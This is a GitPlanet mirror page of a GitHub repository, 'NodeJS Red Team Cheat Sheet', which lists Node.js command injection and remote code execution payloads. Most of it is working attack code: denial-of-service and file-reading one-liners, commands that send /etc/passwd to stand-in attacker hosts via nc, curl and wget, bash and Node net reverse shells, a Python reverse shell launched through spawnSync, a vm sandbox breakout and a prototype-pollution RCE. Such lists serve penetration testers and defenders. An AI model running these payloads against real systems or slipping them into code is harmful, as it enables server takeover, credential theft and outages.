GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → aadityapurani → NodeJS-Red-Team-Cheat-Sheet

aadityapurani / NodeJS-Red-Team-Cheat-Sheet

Licence: other
NodeJS Red-Team Cheat Sheet

Labels

nodejssecuritynodecommandinjectionhackingrcepayloadsnodejs-security

Projects that are alternatives of or similar to NodeJS-Red-Team-Cheat-Sheet

Nodejs Security Must Know
It is a note about security on nodejs
Stars: ✭ 38 (-68.6%)
Mutual labels:  command, injection
Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (+120.66%)
Mutual labels:  injection, rce
Domainker
BugBounty Tool
Stars: ✭ 40 (-66.94%)
Mutual labels:  injection, rce
Sql Injection Payload List
🎯 SQL Injection Payload List
Stars: ✭ 716 (+491.74%)
Mutual labels:  injection, payloads
Intruderpayloads
A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.
Stars: ✭ 2,779 (+2196.69%)
Mutual labels:  injection, payloads
Ssti Payloads
🎯 Server Side Template Injection Payloads
Stars: ✭ 150 (+23.97%)
Mutual labels:  injection, payloads
Pixload
Image Payload Creating/Injecting tools
Stars: ✭ 586 (+384.3%)
Mutual labels:  injection, payloads
Command Injection Payload List
🎯 Command Injection Payload List
Stars: ✭ 658 (+443.8%)
Mutual labels:  command, injection
PayloadsAll
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 31 (-74.38%)
Mutual labels:  rce, payloads
SimpleCLI
Command Line Interface Library for Arduino
Stars: ✭ 197 (+62.81%)
Mutual labels:  command
unosolo
Work-in-progress Rust application that converts C++ header-only libraries to single self-contained headers.
Stars: ✭ 26 (-78.51%)
Mutual labels:  command
tsdi
Dependency Injection container (IoC) for TypeScript
Stars: ✭ 50 (-58.68%)
Mutual labels:  injection
Loki.Rat
Loki.Rat is a fork of the Ares RAT, it integrates new modules, like recording , lockscreen , and locate options. Loki.Rat is a Python Remote Access Tool.
Stars: ✭ 63 (-47.93%)
Mutual labels:  payloads
dotnet-security-unit-tests
A web application that contains several unit tests for the purpose of .NET security
Stars: ✭ 25 (-79.34%)
Mutual labels:  injection
OSCE
Some exploits, which I’ve created during my OSCE preparation.
Stars: ✭ 74 (-38.84%)
Mutual labels:  rce
inject
A simple Kotlin multi-platform abstraction around the javax.inject annotations.
Stars: ✭ 42 (-65.29%)
Mutual labels:  injection
web-cve-tests
A simple framework for sending test payloads for known web CVEs.
Stars: ✭ 120 (-0.83%)
Mutual labels:  payloads
xtuff
A CLI to generate stuff easy! (components, services, etc...)
Stars: ✭ 28 (-76.86%)
Mutual labels:  command
Umbraco-RCE
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Stars: ✭ 61 (-49.59%)
Mutual labels:  rce
colortest
Quickly show all your terminal colors
Stars: ✭ 66 (-45.45%)
Mutual labels:  command
View All Similar Projects ➔

NodeJS Red Team Cheat Sheet

A curated list of NodeJs Command Injection / RCE Payloads.

Know the evil functions

eval(),setTimeout(),setInterval(), Function(), unserialize()

Know your weapons

fs , child_process, net, http

spawn = returns a stream, returns huge binary data to Node

exec = returns a buffer, should be used to return status

Attack Vectors

Denial of Service

while(1)

Exit the running process

process.exit()

Kill Process

process.kill(process.pid)

Read current working directory

res.end(require('fs').readdirSync('.').toString())

Read previous directory

res.end(require('fs').readdirSync('..').toString())

Read file

res.end(require('fs').readFileSync(fname))

Spawn Magic ( by @aaditya_purani)

require('child_process').spawn('ls',['-a']).stdout.on('data', function (data) {console.log('own'+ data); });

Child exec ( by @artsploit )

require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
require('child_process').exec('curl+-F+"x=`cat+/etc/passwd`"+attackersip.com')

Wget post data (by @brutelogic)

require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')

Using net (by ibreak.software)

var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

Using arguments[1] as response object (by @OrhanAlbay)

arguments[1].end(require('child_process').execSync('whoami'))
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))

Bypass stream limits by compressing to gzip (by @aaditya_purani)

const pwn=require('zlib').createGzip();const inx=require('fs').createReadStream('app.json');const oux = require('fs').createWriteStream('unrestrictive.gz');inx.pipe(pwn).pipe(oux)

Sandbox Bypass spawnSync (by netspi)

var resp = spawnSync('python',
['-c',
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
]
);
print(resp.stdout);
print(resp.stderr);

vm module breakout (by pwnisher)

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

Alternative RCE payload (by mahmoud)

x = ''
myToString = x.toString.bind("console.log(process.env)")
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
Object.constructor("test", this)()

Need More ?

Repository would be maintained time to time. Feel free to contribute.

Contact

@aaditya_purani

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].